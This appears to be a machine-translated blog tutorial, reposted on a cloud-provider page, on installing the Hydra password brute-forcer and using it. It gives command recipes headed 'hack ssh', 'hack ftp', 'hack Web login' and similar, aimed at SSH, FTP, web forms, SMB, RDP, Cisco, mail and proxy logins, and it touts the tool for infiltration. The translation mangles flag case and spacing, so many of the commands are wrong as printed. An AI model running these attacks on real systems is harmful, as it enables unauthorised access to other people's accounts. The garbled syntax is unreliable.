Linux Brute force hack tool Hydra

Source: Internet
Author: User
Tags http post imap

Install Brute force hack tool

# yum Install CMake

# CD/USR/LOCAL/SRC

# wget http://www.libssh.org/files/0.4/libssh-0.4.8.tar.gz

# tar zxf libssh-0.4.8.tar.gz

# CD libssh-0.4.8

# mkdir Build

# CD Build

# Cmake-dcmake_install_prefix=/usr-dcmake_build_type=debug-dwith_ssh1=on.

# make

# make Install

#/sbin/ldconfig//To execute this sentence, otherwise it will appear hydra:error while loading shared libraries:libssh.so.4:cannot open Shared object file:n o Such file or directory


# CD/USR/LOCAL/SRC

# wget http://freeworld.thc.org/releases/hydra-6.3-src.tar.gz

# tar zxf hydra-6.3-src.tar.gz

# CD HYDRA-6.3-SRC

#./configure

# make

# make Install


#########################################

Hydra [[[-L LOGIN|-L file] [-P pass|-p file] | [-c FILE]] [-e NS]

[-O FILE] [-T TASKS] [-M FILE [-t TASKS]] [-W Time] [-F] [-S PORT] [-S] [-VV] Server service [OPT]

-R continues to crack from the last progress.

-S uses SSL links.

-S port allows you to specify a nondefault port with this parameter.

-L LOGIN Specifies the cracked user to crack for a specific user.

-L FILE Specifies the user name dictionary.

-P PASS Lowercase, specify password cracking, less use, usually using a password dictionary.

-P FILE Uppercase, specifying the password dictionary.

-e ns Optional option, N: null password heuristic, s: Use specified user and password heuristics.

-C FILE uses a colon-delimited format, such as "Login: password" instead of the-l/-p parameter.

-m file specifies a single line of target list files.

-o file specifies the result output files.

-F after using the-m parameter, find the first pair of login or password to stop the crack.

The number of threads running concurrently with-T TASKS, which defaults to 16.

-W time sets the maximum timeout, in seconds, which is 30s by default.

-V/-V displays detailed procedures.

Server Destination IP

Service name, supported services and protocols: Telnet FTP POP3[-NTLM] IMAP[-NTLM] SMB smbnt http-{head|get} http-{get|post}-form http-proxy Cisco cisco-enable VNC ldap2 ldap3 MSSQL mysql oracle-listener postgres NNTP socks5 rexec rlogin pcnfs SNMP rsh CVS svn ic Q sapr3 ssh SMTP-AUTH[-NTLM] pcanywhere teamspeak SIP VMAUTHD Firebird NCP AFP et cetera.

opt selectable options

################################################

1. hack ssh:

# hydra-l users.txt-p password.txt-t 1-vv-e ns 192.168.1.8 SSH

Crack success, direct display results. You can also specify the result output file using the-o option.

# hydra-l users.txt-p password.txt-t 1-vv-e ns-o save.log 192.168.1.104 ssh





1. hack ssh:

# hydra-l User name-p password Dictionary-t thread-vv-e NS IP SSH

# hydra-l User name-p password Dictionary-t thread-o save.log-vv IP ssh



2. hack ftp:


# Hydra IP ftp-l user name-p password Dictionary-t thread (default)-VV

# Hydra IP ftp-l user name-p password Dictionary-e ns-vv


3.get way to commit, hack Web login:


# hydra-l User name-p password Dictionary-t thread-vv-e NS IP http-get/admin/

# hydra-l User name-p password Dictionary-t thread-vv-e ns-f IP http-get/admin/index.php



4.post way to commit, hack Web login:


# hydra-l User name-p password Dictionary-s-IP http-post-form "/admin/login.php:username=^user^&password=^pass^&submit=login: Sorry password "

# hydra-t 3-l admin-p pass.txt-o out.txt-f 10.36.16.18 http-post-form "Login.php:id=^user^&passwd=^pass^:wrong US Ername or password "

(parameter description:-T simultaneous thread number 3,-L username is admin, dictionary pass.txt, save as Out.txt,-f when cracked a password on stop, 10.36.16.18 target IP, Http-post-form means that the hack is a form password cracking,<title> that is submitted using the HTTP POST method, which is the return information hint that represents the error guess. )


5. hack https:


# hydra-m/index.php-l muts-p pass.txt 10.36.16.18 HTTPS



6. Crack TeamSpeak:


# hydra-l User name-p password Dictionary-s port number-VV IP teamspeak


7. hack Cisco:


# hydra-p Pass.txt 10.36.16.18 Cisco

# hydra-m cloud-p pass.txt 10.36.16.18 cisco-enable



8. Crack SMB:


# hydra-l administrator-p pass.txt 10.36.16.18 SMB


9. Crack POP3:


# hydra-l muts-p pass.txt my.pop3.mail POP3



10. hack RDP:


# Hydra IP rdp-l administrator-p pass.txt-v


11. Crack Http-proxy:


# hydra-l Admin-p pass.txt http-proxy://10.36.16.18


12. hack IMAP:


# HYDRA-L USER.TXT-P Secret 10.36.16.18 IMAP PLAIN

# hydra-c Defaults.txt-6 Imap://[fe80::2c:31ff:fe12:ac11]:143/plain

This tool is far more powerful than the above test, its password can be cracked key lies in a powerful dictionary, for social work-type infiltration, sometimes can get a multiplier effect


This article is from the "believe it or not you" blog, please be sure to keep this source http://312461613.blog.51cto.com/965442/1601226

Brute Force hack tool Hydra under Linux

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.